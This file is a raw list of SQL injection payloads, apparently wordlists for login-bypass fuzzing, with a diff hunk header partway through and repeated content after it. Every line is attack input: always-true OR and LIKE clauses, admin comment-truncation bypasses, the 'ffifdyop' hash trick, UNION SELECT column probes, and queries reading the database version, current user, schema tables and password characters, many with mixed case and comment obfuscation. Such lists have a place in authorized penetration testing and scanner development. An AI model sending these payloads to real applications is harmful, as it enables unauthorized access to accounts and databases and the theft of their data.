"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
